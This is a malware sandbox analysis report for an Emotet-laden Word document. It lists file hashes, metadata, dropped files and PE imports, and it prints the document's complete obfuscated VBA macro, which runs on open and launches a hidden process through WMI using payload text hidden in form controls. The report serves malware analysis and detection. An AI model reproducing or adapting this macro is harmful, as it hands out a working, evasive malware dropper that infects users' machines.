cc4e6e42...882e | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Spyware
Threat Names:
MailPassView
Emotet
Generic.EmotetU.C007116A
...

emotet_e2_cc4e6e42f73500c72d0d0820b4a3c131e2f8fce4d7d730eb8f9fc1b5cc3e882e_2020-07-17__192909.doc

Word Document

Created at 2020-07-17T21:32:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\emotet_e2_cc4e6e42f73500c72d0d0820b4a3c131e2f8fce4d7d730eb8f9fc1b5cc3e882e_2020-07-17__192909.doc Sample File Word Document
Malicious
»
Mime Type application/msword
File Size 192.11 KB
MD5 d40863c1d11d96d51e09252558e09946 Copy to Clipboard
SHA1 f4a52b0eccaaebfeb65ee380be4c10c114d0fcfb Copy to Clipboard
SHA256 cc4e6e42f73500c72d0d0820b4a3c131e2f8fce4d7d730eb8f9fc1b5cc3e882e Copy to Clipboard
SSDeep 6144:UQBm+kz6grRxMZ38cyUJEpKSg3PswF2K95wr8Br3qlJcnnVNpRr:UQBm+kz6g1xY8cyKnVNpRr Copy to Clipboard
ImpHash -
Parser Error Remark Static engine was unable to completely parse the analyzed file
Office Information
»
Revision 1
Create Time 2020-07-17 19:04:00+00:00
Modify Time 2020-07-17 19:04:00+00:00
Document Information
»
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 4
Character Count 26
Chars With Spaces 29
scale_crop False
shared_doc False
Controls (4)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
{46E31370-3F7A-11CE-BED6-00AA00611080} FormsMultiPage -
{6E182020-F460-11CE-9BCD-00AA00608E01} FormsFrame -
{C62A69F0-16DC-11CE-9E98-00AA00574A4F} Form -
VBA Macros (2)
»
Macro #1: joiwweiquvair
»
Attribute VB_Name = "joiwweiquvair"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
yuamcuatpaztheubchuthpiv
End Sub
Macro #2: kuujdout
»
Attribute VB_Name = "kuujdout"
Function yuamcuatpaztheubchuthpiv()
tuuwchoopwowgithcheix = Chr(zouzluumthoempooh.Zoom + 1 + 4 + 10)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
vaodboorqueodquuuthcav = "*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDw*6723tguT&^$^RFy23uikJGDi*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDn*6723tguT&^$^RFy23uikJGDm*6723tguT&^$^RFy23uikJGDg*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDmt*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGD" + tuuwchoopwowgithcheix + ":*6723tguT&^$^RFy23uikJGDwi*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDn3*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGD2*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGD_*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGD" + zouzluumthoempooh.xequfooxheik + "r*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDo*6723tguT&^$^RFy23uikJGDce*6723tguT&^$^RFy23uikJGDs*6723tguT&^$^RFy23uikJGD*6723tguT&^$^RFy23uikJGDs*6723tguT&^$^RFy23uikJGD"
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
tuutsebkaup = quovcoaljiochchuav(vaodboorqueodquuuthcav)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
Set moizjeakveiqugaiy = CreateObject(tuutsebkaup)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
veiwjiwsuak = zouzluumthoempooh.fiztouxtivyeulwauy.ControlTipText
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
gochwiol = tuutsebkaup + tuuwchoopwowgithcheix + zouzluumthoempooh.yoonfeacciequ.ControlTipText + veiwjiwsuak
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
poackeoqumioylutxoahchiech = gochwiol + zouzluumthoempooh.xequfooxheik
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
Set cainchoohtaoyneibquaikfaew = vootcoajboedqueoh(poackeoqumioylutxoahchiech)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
Call moizjeakveiqugaiy. _
Create(vVXqw + vVXqw + conzuugdeerboocchath + vVXqw, tuuyteich, cainchoohtaoyneibquaikfaew)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
End Function
Function vootcoajboedqueoh(vooy)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
Set vootcoajboedqueoh = CreateObject(vooy)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
vootcoajboedqueoh _
.showwindow = (peiwheiptev + deip) + (devbaukvoy + sapbiadxauhyainjobrood)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
End Function
Function quovcoaljiochchuav(voigxosleubthauth)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
theadfuk = voigxosleubthauth
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
bougtiexsoiw = Split(theadfuk, "*6723tguT&^$^RFy23uikJGD")
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
coupxoycees = vVXqw + Join(bougtiexsoiw, vVXqw)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
quovcoaljiochchuav = coupxoycees
End Function
Function conzuugdeerboocchath()
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
n2 = zouzluumthoempooh.xeukyaejzed.Pages(1).ControlTipText
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
conzuugdeerboocchath = quovcoaljiochchuav(n2)
   bwcL = Chr$(55) & Chr$(54) & Chr$(50) & Chr$(51) & Chr$(121) & Chr$(103) & Chr$(98) & Chr$(104) & Chr$(106) & Chr$(100) & Chr$(107) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(100) & Chr$(113) & Chr$(103) & Chr$(119) & Chr$(100) & Chr$(117) _
 & Chr$(105) & Chr$(50) & Chr$(51) & Chr$(98) & Chr$(106) & Chr$(107) & Chr$(115)
vVXq = lBGc
vVXqw = ""
vVXq = Chr$(108) & Chr$(66) & Chr$(71) & Chr$(99)
If vVXq <> bwcL Then
ZCAQ = bwcL
UCkV = 6
Do While UCkV < 47
DoEvents: UCkV = UCkV + 1
Loop
End If
End Function

Document Content
»
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
c:\users\aetadzjz\appdata\local\temp\~dffef753ea52c98ec7.tmp Dropped File OLE Compound
Whitelisted
»
Mime Type application/CDFV2
File Size 1.50 KB
MD5 72f5c05b7ea8dd6059bf59f50b22df33 Copy to Clipboard
SHA1 d5af52e129e15e3a34772806f6c5fbf132e7408e Copy to Clipboard
SHA256 1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164 Copy to Clipboard
SSDeep 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
c:\users\aetadzjz\appdata\local\temp\~df05c10ebc82ac79d1.tmp Dropped File Stream
Whitelisted
»
Also Known As c:\users\aetadzjz\appdata\local\temp\~dfe32be11fe2be5294.tmp (Dropped File)
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Whitelisted
C:\Users\aETAdzjz\AppData\Local\msvcr100\certmgroe.exe Dropped File Binary
Whitelisted
»
Also Known As C:\Users\aETAdzjz\AppData\Local\msvcr100\certmgrom.exe (Dropped File)
C:\Windows\system32\cmd.exe (Dropped File)
Mime Type application/vnd.microsoft.portable-executable
File Size 337.00 KB
MD5 5746bd7e255dd6a8afa06f7c42c1ba41 Copy to Clipboard
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 Copy to Clipboard
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 Copy to Clipboard
SSDeep 6144:NVl7yDR2iaGcsVXFBM6IT77aVebJWC1jIdDWCoCX9Sm:jdyDRwpmFq6ITSebJWwjIdDbNS Copy to Clipboard
ImpHash d0058544e4588b1b2290b7f4d830eb0a Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
PE Information
»
Image Base 0x4ad00000
Entry Point 0x4ad090b4
Size Of Code 0x27200
Size Of Initialized Data 0x2ce00
File Type FileType.executable
Subsystem Subsystem.windows_cui
Machine Type MachineType.amd64
Compile Timestamp 2010-11-20 09:46:13+00:00
Version Information (8)
»
CompanyName Microsoft Corporation
FileDescription Windows Command Processor
FileVersion 6.1.7601.17514 (win7sp1_rtm.101119-1850)
InternalName cmd
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename Cmd.Exe
ProductName Microsoft® Windows® Operating System
ProductVersion 6.1.7601.17514
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x4ad01000 0x270cc 0x27200 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.44
.rdata 0x4ad29000 0x4910 0x4a00 0x27600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.1
.data 0x4ad2e000 0x1d398 0x1d400 0x2c000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.17
.pdata 0x4ad4c000 0x26dc 0x2800 0x49400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.34
.rsrc 0x4ad4f000 0x8458 0x8600 0x4bc00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.32
.reloc 0x4ad58000 0x124 0x200 0x54200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.44
Imports (4)
»
msvcrt.dll (68)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
memset 0x0 0x4ad29000 0x2a7f8 0x28df8 0x484
memcpy 0x0 0x4ad29008 0x2a800 0x28e00 0x480
memcmp 0x0 0x4ad29010 0x2a808 0x28e08 0x47f
_setjmp 0x0 0x4ad29018 0x2a810 0x28e10 0x2b3
?terminate@@YAXXZ 0x0 0x4ad29020 0x2a818 0x28e18 0x30
__set_app_type 0x0 0x4ad29028 0x2a820 0x28e20 0x80
_fmode 0x0 0x4ad29030 0x2a828 0x28e28 0x118
_commode 0x0 0x4ad29038 0x2a830 0x28e30 0xc4
__setusermatherr 0x0 0x4ad29040 0x2a838 0x28e38 0x82
_amsg_exit 0x0 0x4ad29048 0x2a840 0x28e40 0xa0
_initterm 0x0 0x4ad29050 0x2a848 0x28e48 0x16c
_cexit 0x0 0x4ad29058 0x2a850 0x28e50 0xb3
_exit 0x0 0x4ad29060 0x2a858 0x28e58 0xff
_XcptFilter 0x0 0x4ad29068 0x2a860 0x28e60 0x52
__C_specific_handler 0x0 0x4ad29070 0x2a868 0x28e68 0x53
__getmainargs 0x0 0x4ad29078 0x2a870 0x28e70 0x71
calloc 0x0 0x4ad29080 0x2a878 0x28e78 0x413
free 0x0 0x4ad29088 0x2a880 0x28e80 0x43a
_wcslwr 0x0 0x4ad29090 0x2a888 0x28e88 0x37d
qsort 0x0 0x4ad29098 0x2a890 0x28e90 0x492
_dup2 0x0 0x4ad290a0 0x2a898 0x28e98 0xef
_dup 0x0 0x4ad290a8 0x2a8a0 0x28ea0 0xee
_close 0x0 0x4ad290b0 0x2a8a8 0x28ea8 0xc2
_open_osfhandle 0x0 0x4ad290b8 0x2a8b0 0x28eb0 0x281
swscanf 0x0 0x4ad290c0 0x2a8b8 0x28eb8 0x4cb
_ultoa 0x0 0x4ad290c8 0x2a8c0 0x28ec0 0x327
_pipe 0x0 0x4ad290d0 0x2a8c8 0x28ec8 0x287
wcsncmp 0x0 0x4ad290d8 0x2a8d0 0x28ed0 0x4f9
_setmode 0x0 0x4ad290e0 0x2a8d8 0x28ed8 0x2b7
exit 0x0 0x4ad290e8 0x2a8e0 0x28ee0 0x420
iswxdigit 0x0 0x4ad290f0 0x2a8e8 0x28ee8 0x468
time 0x0 0x4ad290f8 0x2a8f0 0x28ef0 0x4d2
srand 0x0 0x4ad29100 0x2a8f8 0x28ef8 0x4aa
_wtol 0x0 0x4ad29108 0x2a900 0x28f00 0x3f7
fflush 0x0 0x4ad29110 0x2a908 0x28f08 0x427
wcsstr 0x0 0x4ad29118 0x2a910 0x28f10 0x502
iswalpha 0x0 0x4ad29120 0x2a918 0x28f18 0x45d
wcstoul 0x0 0x4ad29128 0x2a920 0x28f20 0x509
_errno 0x0 0x4ad29130 0x2a928 0x28f28 0xf6
printf 0x0 0x4ad29138 0x2a930 0x28f30 0x48b
rand 0x0 0x4ad29140 0x2a938 0x28f38 0x495
_iob 0x0 0x4ad29148 0x2a940 0x28f40 0x16f
fprintf 0x0 0x4ad29150 0x2a948 0x28f48 0x433
wcsrchr 0x0 0x4ad29158 0x2a950 0x28f50 0x4fe
realloc 0x0 0x4ad29160 0x2a958 0x28f58 0x497
towlower 0x0 0x4ad29168 0x2a960 0x28f60 0x4d9
setlocale 0x0 0x4ad29170 0x2a968 0x28f68 0x49f
_wcsupr 0x0 0x4ad29178 0x2a970 0x28f70 0x394
iswdigit 0x0 0x4ad29180 0x2a978 0x28f78 0x461
_wcsicmp 0x0 0x4ad29188 0x2a980 0x28f80 0x379
iswspace 0x0 0x4ad29190 0x2a988 0x28f88 0x466
wcschr 0x0 0x4ad29198 0x2a990 0x28f90 0x4ef
memmove 0x0 0x4ad291a0 0x2a998 0x28f98 0x482
fgets 0x0 0x4ad291a8 0x2a9a0 0x28fa0 0x42a
_pclose 0x0 0x4ad291b0 0x2a9a8 0x28fa8 0x284
ferror 0x0 0x4ad291b8 0x2a9b0 0x28fb0 0x426
feof 0x0 0x4ad291c0 0x2a9b8 0x28fb8 0x425
_wpopen 0x0 0x4ad291c8 0x2a9c0 0x28fc0 0x3c9
_wcsnicmp 0x0 0x4ad291d0 0x2a9c8 0x28fc8 0x383
_vsnwprintf 0x0 0x4ad291d8 0x2a9d0 0x28fd0 0x358
wcstol 0x0 0x4ad291e0 0x2a9d8 0x28fd8 0x506
_get_osfhandle 0x0 0x4ad291e8 0x2a9e0 0x28fe0 0x144
_getch 0x0 0x4ad291f0 0x2a9e8 0x28fe8 0x14f
towupper 0x0 0x4ad291f8 0x2a9f0 0x28ff0 0x4da
wcsspn 0x0 0x4ad29200 0x2a9f8 0x28ff8 0x501
_tell 0x0 0x4ad29208 0x2aa00 0x29000 0x314
longjmp 0x0 0x4ad29210 0x2aa08 0x29008 0x473
_local_unwind 0x0 0x4ad29218 0x2aa10 0x29010 0x1d0
ntdll.dll (14)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RtlCaptureContext 0x0 0x4ad29228 0x2aa20 0x29020 0x27b
RtlLookupFunctionEntry 0x0 0x4ad29230 0x2aa28 0x29028 0x402
RtlVirtualUnwind 0x0 0x4ad29238 0x2aa30 0x29030 0x4f1
RtlFreeHeap 0x0 0x4ad29240 0x2aa38 0x29038 0x34b
NtFsControlFile 0x0 0x4ad29248 0x2aa40 0x29040 0x12a
NtOpenThreadToken 0x0 0x4ad29250 0x2aa48 0x29048 0x16c
NtClose 0x0 0x4ad29258 0x2aa50 0x29050 0xd6
NtOpenProcessToken 0x0 0x4ad29260 0x2aa58 0x29058 0x164
NtQueryInformationToken 0x0 0x4ad29268 0x2aa60 0x29060 0x192
RtlDosPathNameToNtPathName_U 0x0 0x4ad29270 0x2aa68 0x29068 0x300
RtlFindLeastSignificantBit 0x0 0x4ad29278 0x2aa70 0x29070 0x339
NtSetInformationProcess 0x0 0x4ad29280 0x2aa78 0x29078 0x1f2
NtQueryInformationProcess 0x0 0x4ad29288 0x2aa80 0x29080 0x18f
RtlNtStatusToDosError 0x0 0x4ad29290 0x2aa88 0x29088 0x415
KERNEL32.dll (146)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetTimeFormatW 0x0 0x4ad292a0 0x2aa98 0x29098 0x29c
GetTickCount 0x0 0x4ad292a8 0x2aaa0 0x290a0 0x298
